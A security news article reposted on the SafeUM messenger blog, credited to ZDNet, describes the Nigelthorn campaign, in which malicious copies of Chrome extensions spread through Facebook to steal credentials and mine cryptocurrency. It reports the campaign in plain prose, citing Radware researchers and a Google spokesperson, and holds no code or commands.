SafeUM
Home Blog Services Download Help About Recharge

Axarhöfði 14, 110 Reykjavik, Iceland

Iceland - 2015
SafeUM
Blog
Services
Download
Help
About
Recharge
Menu
Archive
TOP Security!
14 May 2018

Nigelthorn malware steals Facebook credentials, mines for cryptocurrency

A new malware campaign has been uncovered on Facebook which not only steals account credentials but also installs scripts for covert cryptocurrency mining.

Cybersecurity firm Radware said in a blog post on Thursday that Nigelthorn is a new campaign which focuses on the Facebook social network.

The malware is so called due to the abuse of a legitimate Google Chrome extension called "Nigelify," which replaces images displayed on a web page with pictures of Nigel Thornberry, a cartoon character from the television show The Wild Thornberrys. Nigelthorn was discovered in May this year and has infected over 100,000 Facebook users in over 100 countries to date. According to Radware researchers, the Nigelthorn campaign is propagating across the social network through social engineering and private messages and aims to dupe users into downloading malware for the purpose of account hijacking, cryptojacking, and click fraud.

Potential victims will see a message from a connection in their network which tags them in a post or will receive private messages which alternatively contain a malicious link or picture.

If a victim clicks through, the malicious link redirects victims to a fake YouTube page which requests that users install a Google Chrome extension in order to play video content.

In order to bypass Google's validation checks, the threat actor responsible creates copies of legitimate extensions and inject short, obfuscated, malicious scripts within them.

Once a user accepts the "Add Extension" request, a malicious extension is installed and the victim's system is added to a botnet.

These malicious extensions also redirect the victim to Facebook in order to generate a session token and hijack their online session in order to slurp up their Facebook account credentials and send them to command-and-control (C&C) server.

This access also permits the malware to send messages in their stead and propagate further. Nigelthorn is also capable of stealing Instagram cookies if they are found. Once the malicious extension is installed on the Google Chrome browser, malicious JavaScript comes into play. The script is downloaded from the C&C server and further installs a cryptomining tool.

This tool forces the victim's machine to covertly mine for cryptocurrencies, of which the proceeds are sent to mining pools controlled by the attacker. Radware says that in the last few days, Monero, Bytecoin, and Electroneum are the mining targets and the attackers have made roughly $1,000.

Nigelthorn employs a number of techniques in order to retain persistency on the victim's machine. If a victim tries to open the extensions tab, the malware automatically closes it. The malware also blocks users from downloading Facebook and Chrome cleaner tools, deleting Facebook posts, and making comments.

While malicious copies of Nigelify are responsible for the majority of infections, the researchers have also discovered other legitimate extensions which have been abused including PwnerLike and iHabno. Four other extensions were detected by Google's security systems and were removed in less than 24 hours.

The majority of infections have taken place in the Philippines, Venezuela, and Ecuador. "The malware depends on Chrome and runs on both Windows and Linux," the researchers say. "It is important to emphasize that the campaign focuses on Chrome browsers and Radware believes that users that do not use Chrome are not at risk."

A Google spokesperson told that "we removed the malicious extensions from Chrome Web Store and the browsers of the small percentage of affected users within hours of being alerted."

Tags:
information leaks Facebook
Source:
ZDNet
1902
Other NEWS
3 Jul 2020 safeum news imgage An encrypted messaging service has been infiltrated by police
4 May 2020 safeum news imgage Two-Factor Authentication ​What Is It and Why You Should Use It
12 Dec 2019 safeum news imgage Encryption is under threat - this is how it affects you
4 Nov 2019 safeum news imgage Should Big Decisions Be Based on Data or Your Intuition?
7 Jun 2018 safeum news imgage VPNFilter malware infecting 500,000 devices is worse than we thought
4 Jun 2018 safeum news imgage Hackers target Booking.com in criminal bid to steal hundreds of thousands from customers
1 Jun 2018 safeum news imgage Operator of World's Top Internet Hub Sues German Spy Agency
30 May 2018 safeum news imgage US says North Korea behind malware attacks
29 May 2018 safeum news imgage Facebook and Google targeted as first GDPR complaints filed
25 May 2018 safeum news imgage A new reason to not buy these cheap Android devices
24 May 2018 safeum news imgage Flaws in smart pet devices, apps could come back to bite owners
23 May 2018 safeum news imgage Google sued for 'clandestine tracking' of 4.4m UK iPhone users' browsing data
21 May 2018 safeum news imgage LocationSmart reportedly leaked phone location data onto the web
18 May 2018 safeum news imgage The SEC created its own scammy ICO to teach investors a lesson
17 May 2018 safeum news imgage Thieves suck millions out of Mexican banks in transfer heist
All news
SafeUM
Confidential Terms of Use Our technologies Company
Follow us
Download
SafeUM © Safe Universal Messenger

Axarhöfði 14,
110 Reykjavik, Iceland

Iceland - 2015